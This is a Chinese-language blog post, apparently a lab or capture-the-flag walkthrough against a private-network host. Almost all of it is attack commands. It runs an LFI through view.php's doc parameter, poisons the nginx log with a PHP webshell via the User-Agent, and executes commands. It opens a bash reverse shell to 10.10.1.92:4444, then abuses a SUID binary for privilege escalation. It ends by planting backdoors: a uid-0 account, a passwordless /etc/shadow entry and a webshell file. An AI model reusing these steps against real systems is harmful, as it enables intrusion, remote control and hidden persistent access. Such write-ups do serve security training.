kizumi_header_banner_img

这里是幻灬十一的博客,欢迎来到我的世界

加载中

文章导读

0605-vb-04


avatar
11 2026年6月16日 12

1.扫描端口

命令:nmap  -sV 10.10.1.111

2.爆破目录

命令:gobuster dir -u http://10.10.1.111/includes -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql,phtml -t 50 –exclude-length 2042

3.查看密码,账户等

命令:http://10.10.1.111/view.php?doc=../../../../etc/passwd

4.在爆破的时候发现了这个文件但打不开,利用伪协议查看view.php

命令:http://10.10.1.111/view.php?doc=php://filter/convert.base64-encode/resource=../../../../var/www/html/view.php

伪协议:普通写 view.php:服务器会执行 php 代码,返回页面渲染结果,看不到源代码。

利用翻译可以看到这个源码,doc没有进行任何渲染就直接写入。

5.查看错误日志

命令:http://10.10.1.111/view.php?doc=../../../var/log/nginx/error.log

6.查看成功日志

命令:http://10.10.1.111/view.php?doc=php://filter/read=convert.base64-encode/resource=../../../var/log/nginx/access.log

可能因为其他限制问题不能查看,使用转义查看

7.尝试在日志里写入一句话木马

命令:curl -A “<?php system(\$_GET[‘cmd’]); ?>” http://10.10.1.111/view.php

写入后可以在成功日志里看到,失败日志也可以看但里面的木马会被转义

8.尝试调用

命令:curl “http://10.10.1.111/view.php?doc=../../../../../var/log/nginx/access.log&cmd=ls”

9.反弹连接并修复交互页面

命令:curl -G “http://10.10.1.111/view.php” \
–data-urlencode “doc=../../../../var/log/nginx/access.log” \
–data-urlencode “cmd=bash -c ‘bash -i >& /dev/tcp/10.10.1.92/4444 0>&1′”

命令:

  1. python3 -c “import pty;pty.spawn(‘/bin/bash’)”      调用 Pythonpty 模块,为 bash 分配虚拟终端,解决底层终端设备报错。
  2. Ctrl + Z      将当前反弹 shell 挂入后台
  3. stty raw -echo; fg
  4. stty raw -echo:      本地终端切换原始传输模式、关闭输入重复回显

10.查找suid文件

命令:find / -perm -g+s -type f -ls 2>/dev/null

查找出来可以发只有一个文件与众不同,合理猜测提权就是利用它

11.提权

命令: /opt/yxdocs/bin/.rb -p

12.寻找flag

命令: grep -r “flag{” /var

13.后门

命令:useradd -o -u 0 -g 0 -M -s /bin/bash

命令:apt update

命令:apt install vim -y

命令:vim /etc/shadow

在里面末尾写一个xwf::20420:0:99999:7:::     这样下次就不用提权了

命令:echo “<?php system(\$_GET[‘xwf’]);?>” > 123.php



评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字
插入代码